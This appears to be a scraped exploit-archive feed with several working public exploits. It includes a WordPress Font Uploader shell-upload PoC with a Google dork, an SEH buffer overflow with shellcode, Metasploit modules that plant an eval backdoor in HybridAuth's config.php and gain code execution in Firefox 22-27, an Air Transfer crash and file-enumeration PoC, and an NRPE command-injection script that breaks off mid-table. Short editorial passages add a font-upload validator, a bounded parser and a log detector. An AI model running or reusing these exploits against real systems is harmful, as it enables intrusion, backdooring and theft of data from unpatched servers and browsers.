                "/the_uploader/", "/The%20Uploader/",
                "/The%20Uploader%202.0.4%20-%20Eng/", "/The%20Uploader%202.0.4%20-%20Ita/"
            ]
        else
            uris = [ uri_set ]
        end

        uris.each do |uri|
            res = send_request_cgi({
                'uri'       =>  uri + "index.php",
                'method'    => 'GET',
            }, 20)

            if res and res.code == 200
                if res.body =~ /The Uploader 2\.0/
                    status = "2.0.* version found at #{uri}"
                    code = Exploit::CheckCode::Vulnerable
                    found_uri = uri
                elsif res.body =~ /The Uploader/
                    status = "Detected unknown version at #{uri}"
                    code = Exploit::CheckCode::Detected
                    found_uri = uri
                end

                unless found_uri.nil?
                    #Set appropriate language
                    if res.body =~ /Sezione Upload/
                        lang = "Ita"
                    end

                    http_fingerprint({ :response => res })
                    break
                end
            end
        end

        if found_uri.nil?
            if uri_set == "/"
                status = "Could not find the web site automatically. Enter URI manually?"
            else
                status = "Could not find the web site."
                status << " Use the default URI to search for the web site automatically"
            end
            code = Exploit::CheckCode::Safe
        end

        return { "code" => code, "uri" => found_uri, "lang" => lang, "status" => status }
    end

    def analyse_config(strings, cookie)
        #Acquire the database details
        res = send_request_cgi({
            'uri'       =>  datastore['URI'] + "admin.php?section=upload&category=server",
            'method'    => 'GET',
            'headers'   =>
                {
                    'Cookie'    => cookie
                },
        }, 20)
        unless res and res.code == 200
            raise RuntimeError.new("Acquiring database details failed")
        end
        r = /<input[^>]*name="host"[^>]*value="([^"]*)".*\/>/
        db_host = r.match(res.body)[1]
        r = /<input[^>]*name="user"[^>]*value="([^"]*)".*\/>/
        db_user = r.match(res.body)[1]
        r = /<input[^>]*name="pass"[^>]*value="([^"]*)".*\/>/
        db_pass = r.match(res.body)[1]
        r = /<input[^>]*name="dbnm"[^>]*value="([^"]*)".*\/>/
        db_name = r.match(res.body)[1]

        #Acquire the admin log details
        res = send_request_cgi({
            'uri'       =>  datastore['URI'] + "admin.php?section=admin&category=admin_log",
            'method'    => 'GET',
            'headers'   =>
                {
                    'Cookie'    => cookie
                },
        }, 20)
        unless res and res.code == 200
            raise RuntimeError.new("Acquiring admin log details failed")
        end
        r = /<input[^>]*name="admin_log"[^>]*checked.*\/>/
        if r.match(res.body)
            admin_log = "active"
        else
            admin_log = "inactive"
        end

        return {
            "db_host" => db_host, "db_user" => db_user, "db_pass" => db_pass,
            "db_name" => db_name, "admin_log" => admin_log,
        }
    end

    def check
        analysis = analyse("/")
        print_status(analysis['status'])
        return analysis['code']
    end
end

Wordpress Font Uploader Plugin 1.2.4 - Arbitrary File Upload (author unknown, posted 10:18 AM)
##################################################
# Description : Wordpress Plugins - WordPress Font Uploader Shell Upload Vulnerability
# Version : 1.2.4
# Link : http://wordpress.org/extend/plugins/font-uploader/
# Plugins : http://downloads.wordpress.org/plugin/font-uploader.1.2.4.zip
# Date : 01-06-2012
# Google Dork : inurl:/wp-content/plugins/font-uploader/
##################################################
 
Exploit :

PostShell.php
<?php

$uploadfile = "lo.php.ttf";
$ch = curl_init("http://server/wordpress/wp-content/plugins/font-uploader/font-upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('font' => "@$uploadfile",
          'Submit' => 'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.exemple.com/wordpress/wp-content/plugins/font-uploader/fonts/lo.php.ttf

lo.php.ttf
<?php
phpinfo();
?>
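
The root cause above is that the plugin stores the client-supplied file name verbatim in a web-served directory, so a name ending in .ttf with .php in front of it is both accepted and executed. The following is an added example, not code from the plugin or from this post, of how an upload handler should validate a font file. It uses only the Python standard library; the TrueType/OpenType leading bytes are from the font specifications, and the policy (exactly one extension, an allow-listed name, a server-generated name on disk) is the editor's own.

```python
import os
import re
import secrets

# Leading bytes of the font containers we accept: TrueType (0x00010000 or the
# legacy "true" tag) and CFF-based OpenType ("OTTO"), per the font specs.
FONT_MAGIC = {
    ".ttf": (b"\x00\x01\x00\x00", b"true"),
    ".otf": (b"OTTO",),
}
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_font_upload(filename, content):
    """Return (accepted, reason, stored_name) for an uploaded font.

    The client name only decides which font type was claimed: it must carry
    exactly one extension (so "lo.php.ttf" is refused), and the claim is
    verified against the file's leading bytes, so a PHP file renamed to .ttf
    is refused as well. The name written to disk is generated server-side.
    """
    base = os.path.basename(filename)
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in FONT_MAGIC:
        return False, "extension not allowed: %r" % ext, None
    if "." in stem:
        return False, "multiple extensions not allowed: %r" % base, None
    if not SAFE_STEM.match(stem):
        return False, "unsafe characters in name: %r" % stem, None
    if not content.startswith(FONT_MAGIC[ext]):
        return False, "content does not look like a %s font" % ext, None
    return True, "ok", secrets.token_hex(8) + ext


if __name__ == "__main__":
    # Constructed inputs: the post's payload name with PHP content, and a
    # benign TrueType header.
    for name, body in [("lo.php.ttf", b"<?php phpinfo(); ?>"),
                       ("Roboto-Regular.ttf", b"\x00\x01\x00\x00" + b"\x00" * 12)]:
        print(name, validate_font_upload(name, body)[:2])
```

Content validation is only half of the defence; the fonts directory should also be served with script execution disabled (no PHP handler mapped for it), so that even a file that slips through is returned as bytes rather than run.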

Calavera UpLoader 3.5 - SEH Buffer Overflow (author unknown, posted 10:17 AM)
# padding (Python 2 script: the strings below are written as raw bytes)

rell = "\x41" * 477
rell1 = "\x42" * 4000

head = "\x41" * 8
head += "\x0d\x0a\x31\x0d\x0a"
head1 = "\x0d\x0a"
head2 = "170.1.1.0"
head2 += "\x0d\x0a"
head2 += "\x22"
head2 += "C:\\Archivos2de2programa\\Uploader!\\Uploader!23151EXE"
head2 += "\x22"


# shellcode for calc.exe

shellcode = "\x33\xD2\xB2\x50\x80\xF2\x55\x52\xC6\x45"
shellcode += "\x31\x63\xC6\x45\x32\x61\xC6\x45\x33\x6C"
shellcode += "\xC6\x45\x34\x63\xC6\x45\x35\x2E\xC6\x45\x36\x65"
shellcode += "\xC6\x45\x37\x78\xC6\x45\x38\x65\x88\x45"
shellcode += "\x39\x8D\x45\x31\x50\xB9\x31\x75\x66\x31"
shellcode += "\x81\xF1\x69\x4D\x26\x31\xFF\xe1"

# Next SEH
Nshe = "\xeb\x06\x90\x90"
# POP POP RETN
PPR = "\x38\xbf\x40\x00"

explo = head + rell + Nshe + PPR + shellcode + rell1 + head1 + head2
# binary mode so no newline translation alters the \x0d\x0a separators
arch = open("uploadpref.dat", "wb")

arch.write(explo)
arch.close()
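
The overflow above works because a field of the uploadpref.dat preferences file is copied into a fixed-size buffer with no length check. As an added example, not part of the exploit or of Calavera UpLoader, here is a loader for a preferences file of that shape that enforces a length cap and a printable-ASCII rule per field. The CRLF-delimited layout is inferred from the exploit's head, head1 and head2 strings; MAX_FIELD_LEN, MAX_FIELDS and the sample file contents are assumptions, not figures from the program.

```python
MAX_FIELD_LEN = 256   # assumption: a generous cap for any single preference value
MAX_FIELDS = 32       # assumption: more fields than the file should ever carry


def parse_prefs(data):
    """Parse a CRLF-delimited preferences blob with hard bounds.

    Returns (fields, errors). A field longer than MAX_FIELD_LEN, or holding
    bytes outside printable ASCII, is reported and dropped rather than copied
    onward; an unchecked copy into a fixed-size buffer is what the overflow
    above exploits.
    """
    fields = []
    errors = []
    for index, raw in enumerate(data.split(b"\r\n")):
        if index >= MAX_FIELDS:
            errors.append("too many fields (limit %d)" % MAX_FIELDS)
            break
        if len(raw) > MAX_FIELD_LEN:
            errors.append("field %d too long (%d bytes, limit %d)"
                          % (index, len(raw), MAX_FIELD_LEN))
            continue
        if any(b < 0x20 or b > 0x7E for b in raw):
            errors.append("field %d contains non-printable bytes" % index)
            continue
        fields.append(raw.decode("ascii"))
    return fields, errors


# Constructed samples: a benign file in the layout the exploit writes, and one
# whose third field is oversized the way the exploit's padding is.
BENIGN_PREFS = (b"AAAAAAAA\r\n1\r\n170.1.1.0\r\n"
                b"\"C:\\Program Files\\Uploader!\\Uploader!.exe\"\r\n")
OVERSIZED_PREFS = b"AAAAAAAA\r\n1\r\n" + b"A" * 600 + b"\r\n170.1.1.0\r\n"

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_PREFS), ("oversized", OVERSIZED_PREFS)):
        fields, errors = parse_prefs(blob)
        print(label, fields, errors)
```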

HybridAuth install.php PHP Code Execution (author unknown, posted 10:16 AM)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking # application config.php is overwritten

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HybridAuth install.php PHP Code Execution',
      'Description'    => %q{
        This module exploits a PHP code execution vulnerability in
        HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
        is not removed after installation allowing unauthenticated users to
        write PHP code to the application configuration file 'config.php'.

        Note: This exploit will overwrite the application configuration file
        rendering the application unusable.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Pichaya Morimoto', # Discovery and PoC
          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
        ],
      'References'     =>
        [
          ['EDB', '34273'],
          ['OSVDB','109838']
        ],
      'Arch'           => ARCH_PHP,
      'Platform'       => 'php',
      'Targets'        =>
        [
          # Tested:
          # HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
          ['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Aug 4 2014',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
      ], self.class)
  end


  #
  # Check:
  # * install.php exists
  # * config.php is writable
  # * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
  #
  def check
    res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
    if !res
      vprint_error "#{peer} - Connection failed"
      return Exploit::CheckCode::Unknown
    elsif res.code == 404
      vprint_error "#{peer} - Could not find install.php"
    elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
      vprint_error "#{peer} - #{$1} is not writable"
    elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
      version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
      vprint_status "#{peer} - Found version: #{version}"
      if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
        return Exploit::CheckCode::Vulnerable
      else
        vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable"
      end
    end
    Exploit::CheckCode::Safe
  end

  #
  # Exploit
  #
  def exploit
    # check vuln
    if check != Exploit::CheckCode::Vulnerable
      fail_with Exploit::Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
    end

    # write backdoor
    print_status "#{peer} - Writing backdoor to config.php"
    payload_param = rand(1000)
    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'install.php'),
      'data'   => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
    )
    if !res
      fail_with Failure::Unknown, "#{peer} - Connection failed"
    elsif res.body =~ /Installation completed/
      print_good "#{peer} - Wrote backdoor successfully"
    else
      fail_with Failure::UnexpectedReply, "#{peer} - Could not write backdoor to 'config.php'"
    end

    # execute payload
    code = Rex::Text.encode_base64(payload.encoded)
    print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)"
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'config.php'),
      'data'   => "#{payload_param}=#{code}"
    }, 5)
    if !res
      print_warning "#{peer} - No response"
    elsif res.code == 404
      fail_with Failure::NotFound, "#{peer} - Could not find config.php"
    elsif res.code == 200 || res.code == 500
      print_good "#{peer} - Sent payload successfully"
    end

    # remove backdoor
    print_status "#{peer} - Removing backdoor from config.php"
    res = send_request_cgi(
      'method' => 'POST',
      'uri'    => normalize_uri(target_uri.path, 'install.php'),
      'data'   => 'OPENID_ADAPTER_STATUS='
    )
    if !res
      print_error "#{peer} - Connection failed"
    elsif res.body =~ /Installation completed/
      print_good "#{peer} - Removed backdoor successfully"
    else
      print_warning "#{peer} - Could not remove payload from config.php"
    end
  end
end

Air Transfer Iphone 1.3.9 - Multiple Vulnerabilities (author unknown, posted 10:16 AM)
# Exploit Title: Air Transfer Iphone v1.3.9 - Remote crash, Broken Authentication file download and Memo Access.
# Date: 08/23/2014
# Category: WebApp
# Version: 1.3.9
# Patch/ Fix: Not available
---------------------------------------------------

Disclosure Timeline
=======================
[Aug. 19 2014]  Vendor Contacted
[Aug. 19 2014]  Vendor replied
[Aug. 19 2014]  Vendor Informed about vulnerability with POC.(No reply received)
[Aug. 21 2014]  Notified vendor about Public disclosure after 24 hours (No reply received)
[Aug. 23 2014]  Public Disclosure.

--------------------------------------------------------

Product & Service Details:
==========================
Air Transfer - Easy file sharing between PC and iPhone/iPad, File Manager with Document Viewer, Video Player, Music Player and Web Browser.

Features include:
-----------------

* The easiest way to transfer files between PC and iPhone/iPad!
* Just Drag & Drop your contents and Play: Text, Bookmark, Image and Photo, Music, Movie, Documents and more through wireless connection!



Vulnerability details
=========================
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Remote Application Crashing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#!/usr/bin/python
# Python 2 proof of concept
import socket
import sys
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = raw_input("Enter IP : ")
port = 8080
def connect():
    try:
        s.connect((str(host), port))
    except socket.error:
        print "Error: couldn't connect"
        sys.exit()
    return "connected to target"
# Crashing the App
def crashing():
    req = "GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1\r\n\r\n"
    try:
        s.sendall(req)
    except socket.error:
        print "Error occurred, couldn't crash App"
        sys.exit()
    return "Application Down, Connection closed"
print connect()
print crashing()
______________________________________________________________________________________________________________________________

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
2. Broken Authentication - Memo access & File download.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To download any file, simply visit:

http://<IP>:8080/?downloadSingle?id=1

Just by incrementing the value of "id" we can download all the files.

To view saved memos, visit the link below:

http://<IP>:8080/getText?id=0


We can look for all the memos by incrementing the value of "id".
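
Both issues leave a distinctive trace in the device's HTTP access log: the crash request of section 1 has a second "?" inside the getList query, and the enumeration of section 2 shows as one client walking consecutive ids on getText or downloadSingle. As an added example, not from the advisory, here is a small detector run over a few constructed Common Log Format lines. The log layout and the ENUM_THRESHOLD value are assumptions; the page does not document Air Transfer's actual log format.

```python
import re
from collections import defaultdict

# Common Log Format (assumption: the device's real log layout is not on the page)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
ID_RE = re.compile(r"(?:downloadSingle|getText)\?id=(\d+)")
ENUM_THRESHOLD = 4  # assumption: consecutive ids from one client before alerting

# Constructed sample lines (not captured from a real device).
SAMPLE_LOG = """\
10.0.0.5 - - [23/Aug/2014:10:01:02 +0000] "GET /getText?id=0 HTTP/1.1" 200 512
10.0.0.5 - - [23/Aug/2014:10:01:03 +0000] "GET /getText?id=1 HTTP/1.1" 200 498
10.0.0.5 - - [23/Aug/2014:10:01:03 +0000] "GET /getText?id=2 HTTP/1.1" 200 377
10.0.0.5 - - [23/Aug/2014:10:01:04 +0000] "GET /getText?id=3 HTTP/1.1" 200 1033
10.0.0.5 - - [23/Aug/2014:10:01:05 +0000] "GET /getText?id=4 HTTP/1.1" 200 870
10.0.0.9 - - [23/Aug/2014:10:02:00 +0000] "GET /?downloadSingle?id=7 HTTP/1.1" 200 20480
10.0.0.9 - - [23/Aug/2014:10:02:20 +0000] "GET /index.html HTTP/1.1" 200 2048
10.0.0.7 - - [23/Aug/2014:10:03:00 +0000] "GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1" 500 0
"""


def parse_line(line):
    """Return the log fields as a dict, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_sequential_run(ids, n):
    """True if the integer set contains at least n consecutive values."""
    s = sorted(set(ids))
    run = 1
    for a, b in zip(s, s[1:]):
        run = run + 1 if b == a + 1 else 1
        if run >= n:
            return True
    return bool(s) and run >= n


def detect(log_text, threshold=ENUM_THRESHOLD):
    """Return (rule, client_ip, detail) findings for the two published issues."""
    findings = []
    ids_by_ip = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        target = rec["target"]
        # Rule 1: the crash request shape, a getList query holding a second '?'
        if target.startswith("/getList?") and "?" in target.split("?", 1)[1]:
            findings.append(("malformed-getList", rec["ip"], target))
        # Rule 2: collect object ids per client for the enumeration check
        m = ID_RE.search(target)
        if m:
            ids_by_ip[rec["ip"]].add(int(m.group(1)))
    for ip, ids in sorted(ids_by_ip.items()):
        if is_sequential_run(ids, threshold):
            detail = "%d ids in range %d..%d" % (len(ids), min(ids), max(ids))
            findings.append(("id-enumeration", ip, detail))
    return findings


if __name__ == "__main__":
    for rule, ip, detail in detect(SAMPLE_LOG):
        print("%-18s %-10s %s" % (rule, ip, detail))
```

Detection only narrows the window; the fix on the application side is to stop serving objects by a guessable integer without an authenticated session, and to reject a malformed query string instead of crashing on it.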

Firefox WebIDL Privileged Javascript Injection (author unknown, posted 10:16 AM)
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/exploitation/jsobfu'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  autopwn_info({
    :ua_name    => HttpClients::FF,
    :ua_minver  => "22.0",
    :ua_maxver  => "27.0",
    :javascript => true,
    :rank       => ExcellentRanking
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Firefox WebIDL Privileged Javascript Injection',
      'Description'    => %q{
        This exploit gains remote code execution on Firefox 22-27 by abusing two
        separate privilege escalation vulnerabilities in Firefox's Javascript
        APIs.
      },
      'License' => MSF_LICENSE,
      'Author'  => [
        'Marius Mlynski', # discovery and pwn2own exploit
        'joev' # metasploit module
      ],
      'DisclosureDate' => "Mar 17 2014",
      'References' => [
        ['CVE', '2014-1510'], # open chrome:// url in iframe
        ['CVE', '2014-1511']  # bypass popup blocker to load bare ChromeWindow
      ],
      'Targets' => [
        [
          'Universal (Javascript XPCOM Shell)', {
            'Platform' => 'firefox',
            'Arch' => ARCH_FIREFOX
          }
        ],
        [
          'Native Payload', {
            'Platform' => %w{ java linux osx solaris win },
            'Arch'     => ARCH_ALL
          }
        ]
      ],
      'DefaultTarget' => 0,
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver  => lambda { |ver| ver.to_i.between?(22, 27) }
      }
    ))

    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
    ], self.class)
  end

  def on_request_exploit(cli, request, target_info)
    send_response_html(cli, generate_html(target_info))
  end

  def generate_html(target_info)
    key = Rex::Text.rand_text_alpha(5 + rand(12))
    frame = Rex::Text.rand_text_alpha(5 + rand(12))
    r = Rex::Text.rand_text_alpha(5 + rand(12))
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin
    data_uri = "data:text/html,<script>c = new mozRTCPeerConnection;c.createOffer(function()"+
               "{},function(){top.vvv=window.open('chrome://browser/content/browser.xul', "+
               "'#{r}', 'chrome,top=-9999px,left=-9999px,height=100px,width=100px');})<\/script>"

    js = Rex::Exploitation::JSObfu.new(%Q|
      var opts = #{JSON.unparse(opts)};
      var key = opts['#{key}'];

      // Load the chrome-privileged browser XUL script into an iframe
      var c = new mozRTCPeerConnection;
      c.createOffer(function(){},function(){
        window.open('chrome://browser/content/browser.xul', '#{frame}');
        step1();
      });

      // Inject a data: URI into an internal frame inside of the browser
      // XUL script to pop open a new window with the chrome flag to prevent
      // the new window from being wrapped with browser XUL;
      function step1() {
        var clear = setInterval(function(){

          // throws until frames[0].frames[2] is available (when chrome:// iframe loads)
          frames[0].frames[2].location;

          // we base64 this to avoid the script tag screwing up things when obfuscated
          frames[0].frames[2].location=window.atob('#{Rex::Text.encode_base64(data_uri)}');
          clearInterval(clear);
          setTimeout(step2, 100);
        },10);
      }

      // Step 2: load the chrome-level window up with a data URI, which
      // gives us same-origin. Make sure to load an "<iframe mozBrowser>"
      // into the frame, since that will respond to our messageManager
      // (this is important later)
      function step2() {
        var clear = setInterval(function(){
          top.vvv.location = 'data:text/html,<html><body><iframe mozBrowser '+
                             'src="about:blank"></iframe></body></html>';
          clearInterval(clear);
          setTimeout(step3, 100);
        }, 10);
      }

      function step3() {
        var clear = setInterval(function(){
          if (!frames[0]) return; // will throw until the frame is accessible
          top.vvv.messageManager.loadFrameScript('data:,'+key, false);
          clearInterval(clear);
          setTimeout(function(){top.vvv.close();}, 100);
        }, 10);
      }

    |)

    js.obfuscate

    %Q|
      <!doctype html>
      <html>
        <body>
          <iframe id='#{frame}' name='#{frame}'
                  style='position:absolute;left:-9999999px;height:1px;width:1px;'>
          </iframe>
          <script>
            #{js}
          </script>
          #{datastore['CONTENT']}
        </body>
      </html>
    |
  end
end

NRPE 2.15 - Remote Code Execution Vulnerability (author unknown, posted 10:15 AM)
#!/usr/bin/python
#
#
# Exploit Title : NRPE <= 2.15 Remote Code Execution Vulnerability
#
# Discovered by  : Dawid Golunski
# C crc32 function ripped from check_nrpe_clone by Alan Brenner <alan.brenner@ithaka.org>
#                                       http://www.abcompcons.com/files/nrpe_client.py
#
# pyOpenSSL Library required (http://pyopenssl.sourceforge.net/)
#
# [root@localhost ~]# pip-python install pyOpenSSL
#
# NRPE <= 2.15 Remote Command Execution Vulnerability
# Release date: 17.04.2014
# Discovered by: Dawid Golunski
# Severity: High
# CVE-2014-2913
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2913
# http://www.exploit-db.com/exploits/32925/
# http://www.homelab.it/index.php/2014/05/03/nagios-nrpe-remote-command-injection-test-fix/ (ITA)
#
# Tested on CentOS 5.x, CentOS 6.x, BackBox 3.x, KaliLinux 1.0.6 with Python 2.x
#
# Demo: https://www.youtube.com/watch?v=nmYiBdnWWcE
#

import OpenSSL # non-standard, see http://pyopenssl.sourceforge.net/
import optparse
import os
import signal
import socket
import struct
import sys
import time

banner = """

$$\   $$\ $$$$$$$\  $$$$$$$\  $$$$$$$$\        $$$$$$\        $$\  $$$$$$$\\
$$$\  $$ |$$  __$$\ $$  __$$\ $$  _____|      $$  __$$\     $$$$ | $$  ____|
$$$$\ $$ |$$ |  $$ |$$ |  $$ |$$ |            \__/  $$ |    \_$$ | $$ |
$$ $$\$$ |$$$$$$$  |$$$$$$$  |$$$$$\           $$$$$$  |      $$ | $$$$$$$\\
$$ \$$$$ |$$  __$$< $$  ____/ $$  __|         $$  ____/       $$ | \_____$$\\
$$ |\$$$ |$$ |  $$ |$$ |      $$ |            $$ |            $$ | $$\   $$ |
$$ | \$$ |$$ |  $$ |$$ |      $$$$$$$$\       $$$$$$$$\ $$\ $$$$$$\\$$$$$$  |
\__|  \__|\__|  \__|\__|      \________|      \________|\__|\______|\______/



                  $$$$$$$\   $$$$$$\  $$$$$$$$\\
                  $$  __$$\ $$  __$$\ $$  _____|
                  $$ |  $$ |$$ /  \__|$$ |
                  $$$$$$$  |$$ |      $$$$$\\
                  $$  __$$< $$ |      $$  __|
                  $$ |  $$ |$$ |  $$\ $$ |
                  $$ |  $$ |\$$$$$$  |$$$$$$$$\\
                  \__|  \__| \______/ \________|
                                                   NRPE <= 2.15 R3m0t3 C0mm4nd Ex3cut10n


                =============================================
                - Release date: 17.04.2014
                - Discovered by: Dawid Golunski
                - Severity: High
                - CVE: 2014-2913
                =============================================

                                Written by:

                              Claudio Viviani

                           http://www.homelab.it

                              info@homelab.it
                           homelabit@protonmail.ch

                      https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

"""
# Plugin list for Brute force mode
PluginList = ['check_all',
             'check_apt',
             'check_bdii',
             'check_bonding',
             'check_breeze',
             'check_by_ssh',
             'check_check-updates',
             'check_check_sip',
             'check_cluster',
             'check_dhcp',
             'check_dig',
             'check_disk',
             'check_disk_smb',
             'check_dns',
             'check_dpm-disk',
             'check_dpm-head',
             'check_dummy',
             'check_file_age',
             'check_flexlm',
             'check_fping',
             'check_game',
             'check_hpjd',
             'check_http',
             'check_icmp',
             'check_ide_smart',
             'check_ifoperstatus',
             'check_ifstatus',
             'check_ircd',
             'check_lcgdm',
             'check_lcgdm-common',
             'check_ldap',
             'check_lfc',
             'check_linux_raid',
             'check_load',
             'check_log',
             'check_mailq',
             'check_mrtg',
             'check_mrtgtraf',
             'check_mysql',
             'check_nagios',
             'check_nrpe',
             'check_nt',
             'check_ntp',
             'check_nwstat',
             'check_openmanage',
             'check_oracle',
             'check_overcr',
             'check_perl',
             'check_pgsql',
             'check_ping',
             'check_procs',
             'check_radius',
             'check_real',
             'check_rhev',
             'check_rpc',
             'check_sensors',
             'check_smtp',
             'check_snmp',
             'check_ssh',
             'check_swap',
             'check_tcp',
             'check_time',
             'check_ups',
             'check_users',
             'check_wave']



# nrpe 2.15 skip chars "|`&><'\"\\[]{};" and "$()" but not "\x0a"(new line)
evilchar = "\x0a"

QUERY_PACKET    = 1
RESPONSE_PACKET = 2

NRPE_PACKET_VERSION_2 = 2

# max amount of data we'll send in one query/response
MAX_PACKETBUFFER_LENGTH = 1024


#def debug(sMessage):
#    """Send a string to STDERR"""
#    if DEBUG:
#        sys.stderr.write("%s\n" % sMessage)

class DataPacket:
    """A Python implementation of the C struct, packet."""
    def __init__(self, packet_version, packet_type):
        self.nPacketVersion = packet_version # int16
        self.nPacketType = packet_type # int16
        self.nCRC32 = 0 # u_int32
        self.nResultCode = 2324 # int16
        self.sData = ''
        self.tCRC32 = (
             0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419,
             0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4,
             0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07,
             0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
             0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856,
             0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9,
             0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4,
             0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
             0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3,
             0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a,
             0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599,
             0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
             0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190,
             0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f,
             0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e,
             0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
             0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed,
             0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950,
             0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3,
             0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
             0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a,
             0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5,
             0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010,
             0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
             0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17,
             0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6,
             0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615,
             0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
             0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344,
             0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb,
             0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a,
             0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
             0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1,
